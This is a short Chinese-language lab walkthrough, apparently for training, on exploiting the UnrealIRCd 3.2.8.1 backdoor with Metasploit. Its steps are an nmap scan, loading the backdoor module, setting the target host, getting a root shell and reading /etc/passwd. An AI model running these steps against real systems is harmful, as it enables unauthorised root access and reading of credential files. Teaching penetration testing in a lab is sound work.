Metasploit溢出UnrealIRCd后门漏洞

Metasploit溢出UnrealIRCd后门漏洞

利用UnrealIRCd后门漏洞，获取目标主机的root权限。

某些站点的UnrealIRCd，在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码，远程***者能够执行任意代码。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处，右键菜单选择"在终端中打开"。

1.2在终端中输入命令"nmap -sV 192.168.1.3"，对目标主机进行端口扫描，发现开放6667端口,对应的服务为unreal ircd。

1.3在终端中输入命令"msfconsole"，启动MSF终端。

1.4在终端中输入命令"search unreal ircd"，搜索ircd的相关工具和***载荷。

1.5在终端中输入命令"use exploit/unix/irc/unreal_ircd_3281_backdoor"，启用漏洞利用模块, 提示符就会提示进入到该路径下。

1.6在终端中输入命令"show options"，查看需要设置的相关项，"yes"表示必须填写的参数。

1.7在终端中输入命令"set RHOST 192.168.1.3"，设置目标主机的IP地址。

1.8在终端中输入"exploit", 开始向目标主机***，***成功后，建立shell会话。

1.9在终端中输入"whoami",查看获得的权限为root，输入命令"cat /etc/passwd",查看系统的帐号和密码。